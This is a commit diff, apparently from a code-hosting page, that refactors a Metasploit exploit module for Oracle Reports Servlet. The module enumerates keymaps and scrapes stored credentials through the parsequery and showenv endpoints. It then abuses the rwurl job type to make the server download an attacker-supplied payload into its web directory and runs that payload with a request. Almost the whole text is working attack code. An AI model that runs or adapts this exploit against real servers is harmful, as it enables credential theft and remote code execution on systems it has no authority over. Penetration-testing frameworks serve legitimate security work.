updated
Mekanismen
parent
f6291eb9a8
commit
5a883a4477
|
|
@ -67,19 +67,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
url = datastore['RHOST']
|
||||
url = "http://" + url + "/reports/rwservlet/showmap"
|
||||
uri = URI.parse(url)
|
||||
begin
|
||||
html = uri.open.read
|
||||
rescue
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
if html =~ /Reports Servlet Key Map/
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showmap"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
unless res and res.body.include?("Reports Services")
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
@ -89,28 +86,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
@payload_dir = datastore['PAYDIR']
|
||||
@local_path = ""
|
||||
|
||||
@url = datastore['RHOST']
|
||||
url = "http://" + @url + "/reports/rwservlet/showmap"
|
||||
uri = URI.parse(url)
|
||||
begin
|
||||
html = uri.open.read
|
||||
rescue
|
||||
fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
|
||||
end
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(uri, "/reports/rwservlet/showmap"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if html.include?("Reports Servlet Key Map")
|
||||
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
|
||||
if res and res.body.include?("Reports Services")
|
||||
test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
|
||||
|
||||
#Parse keymaps for servers
|
||||
print_status "#{peer} - Enumerating keymaps ... "
|
||||
uri = target_uri.path
|
||||
test.each do |t|
|
||||
if not @hacked
|
||||
t = t.delete(' ')
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
|
||||
'method' => 'GET',
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
if res.body =~ /userid=(.*)@/
|
||||
authid = $1
|
||||
|
|
@ -161,20 +156,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_good "#{peer} - Found credentials: #{authid}"
|
||||
print_status "#{peer} - Querying showenv ..."
|
||||
|
||||
url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}"
|
||||
uri = URI.parse(url)
|
||||
begin
|
||||
html = uri.open.read
|
||||
rescue
|
||||
print_status("#{peer} - Query failed")
|
||||
else
|
||||
if html =~ /\\(.*)\\showenv/
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
'server' => server,
|
||||
'authid' => authid
|
||||
}
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
if res.body =~ /\\(.*)\\showenv/
|
||||
print_good "#{peer} - Query succeeded!"
|
||||
print_status "#{peer} - Windows install detected "
|
||||
print_status "#{peer} - Uploading payload ..."
|
||||
@local_path = $1.gsub("\\", "/")
|
||||
setup_payload
|
||||
elsif html =~ /\/(.*)\/showenv/
|
||||
elsif res.body =~ /\/(.*)\/showenv/
|
||||
print_good "#{peer} - Query succeeded!"
|
||||
print_status "#{peer} - Linux install detected"
|
||||
print_status "#{peer} - Uploading payload ..."
|
||||
|
|
@ -189,9 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def upload_payload
|
||||
path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
|
||||
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(uri, "/reports/rwservlet"),
|
||||
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
|
||||
'method' => 'GET',
|
||||
'encode_params' => false,
|
||||
'vars_get' => {
|
||||
|
|
@ -201,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'desname' => path,
|
||||
'JOBTYPE' => 'rwurl',
|
||||
'URLPARAMETER' => @payload_url
|
||||
}
|
||||
}
|
||||
})
|
||||
|
||||
if res and res.body.include?("Successfully run")
|
||||
|
|
@ -244,12 +241,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exec_payload
|
||||
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
|
||||
print_status("#{peer} - Executing payload...")
|
||||
if @hacked
|
||||
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
|
||||
print_status("#{peer} - Executing payload...")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
|
||||
'method' => 'GET'
|
||||
})
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue